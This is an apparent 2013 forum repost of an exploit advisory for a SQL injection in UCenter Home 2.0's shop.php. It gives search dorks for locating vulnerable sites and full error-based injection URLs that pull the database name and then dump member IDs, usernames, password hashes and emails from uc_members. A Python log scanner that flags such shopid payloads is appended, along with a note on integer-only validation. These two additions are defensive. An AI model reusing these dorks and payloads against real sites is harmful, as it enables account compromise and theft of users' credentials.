China Network Penetration Testing Alliance

Title: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

Author: admin    Time: 2013-2-27 21:31

__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

For inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

You edit DB `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
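
A defensive counterpart to the advisory above, added here as an example and not part of the original post: since the injection point is the shopid parameter of shop.php, a request whose decoded shopid is not a plain integer is worth flagging in web-server logs. The log lines, IP addresses, shortened payload and finding labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (documentation IPs, shortened payload).
SAMPLE_LOG = """\
192.0.2.10 - - [27/Feb/2013:21:31:02 +0800] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120
192.0.2.44 - - [27/Feb/2013:21:31:09 +0800] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812
192.0.2.44 - - [27/Feb/2013:21:31:15 +0800] "GET /shop.php?ac=view&shopid=253+AND+1=1 HTTP/1.1" 200 5120
192.0.2.10 - - [27/Feb/2013:21:32:40 +0800] "GET /space.php?uid=7 HTTP/1.1" 200 4096
"""

REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
# Building blocks of the MySQL error-based technique named in the advisory.
MARKERS = [re.compile(p, re.I) for p in (
    r"information_schema", r"floor\s*\(\s*rand\s*\(", r"group\s+by", r"concat\s*\(")]


def classify_shopid(value):
    """Return None for a plain numeric id, otherwise a finding label."""
    if re.fullmatch(r"\d{1,10}", value):
        return None
    hits = sum(1 for m in MARKERS if m.search(value))
    return "error-based-sqli-pattern" if hits >= 2 else "non-numeric-shopid"


def scan(log_text):
    """Return (client_ip, label, decoded shopid) for suspicious shop.php requests."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/shop.php"):
            continue
        # parse_qs URL-decodes the value, so %20 and + obfuscation is normalised.
        query = parse_qs(url.query, keep_blank_values=True)
        for value in query.get("shopid", []):
            label = classify_shopid(value)
            if label:
                findings.append((m.group("ip"), label, value))
    return findings


if __name__ == "__main__":
    for ip, label, value in scan(SAMPLE_LOG):
        print(f"{ip}\t{label}\t{value[:60]}")
```

The same integer-only rule, applied to shopid on the server before it reaches the query, closes the input path the advisory relies on.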




